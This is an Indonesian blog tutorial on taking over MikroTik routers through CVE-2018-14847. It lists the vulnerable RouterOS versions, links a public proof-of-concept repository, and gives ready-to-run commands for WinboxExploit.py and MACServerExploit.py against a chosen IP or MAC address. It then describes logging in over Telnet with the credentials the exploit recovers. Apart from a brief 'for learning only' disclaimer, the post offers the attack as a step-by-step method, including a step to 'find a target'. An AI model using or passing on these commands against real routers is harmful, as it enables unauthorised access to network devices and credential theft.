Cara Hacking Mikrotik Dengan WinboxPoC (Github)

 

Hallo sob, kembali lagi di Defnilay - Blog pada artikel kali ini gua bakal membagikan tutorial "Cara Hacking Mikrotik Dengan WinboxPoC (Github)". Simak baik-baik sob!

Perlu diketahui ini adalah bug (CVE-2018-14847) yang memungkinkan remote attacker untuk melakukan bypass proses otentikasi dan membaca file, dengan cara memodifikasi permintaan (Request) untuk mengubah 1 (satu) byte yang terkait dengan Session ID.

Vulnerability untuk versi Mikrotik RouterOs

[ + ] Longterm: 6.30.1 - 6.40.7

[ + ] Stable: 6.29 - 6.42

[ + ] Beta: 6.29rc1 - 6.43rc3

Requirements

[ + ] Python 3+

Perlu diingat bahwa artikel ini hanya sekedar untuk pembelajarann semua percobaan dilakukan pada properti sendiri.saya tidak bertanggung jawab atas perbuatan yang anda lakukan

Langsung saja ke tutorial nya

1. Clone tools WinboxPoc https://github.com/BasuCert/WinboxPoC.git

2. Cari target ( dalam kali ini saya lakukan pada properti milik sendiri)

3. Untuk menggunakan-nya 

    

    Untuk IP Address 

    $ python3 WinboxExploit.py <IP-ADDRESS> [PORT]

    

    IP-ADDRESS : required

    PORT : optional

    contoh 

    $python3 WinboxExploit.py 192.168.1.1 8291

    Untuk MacAddress

    $python3 MACServerExploit.py <MAC-ADDRESS>

    

    MAC_ADDRESS : required

    contoh 

    $python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

SS Hasil

Langsung kita coba loginkan dengan menggunakan Telnet

Masukan Username dan Password yang berhasil kita dapatkan

Dan Hasilnya 

Akhir Kata

Sekian artikel kali ini tentang "Cara Hacking Mikrotik Dengan WinboxPoC (Github)" Semoga bermanfaat dan sampai jumpa di artikel selanjutnya!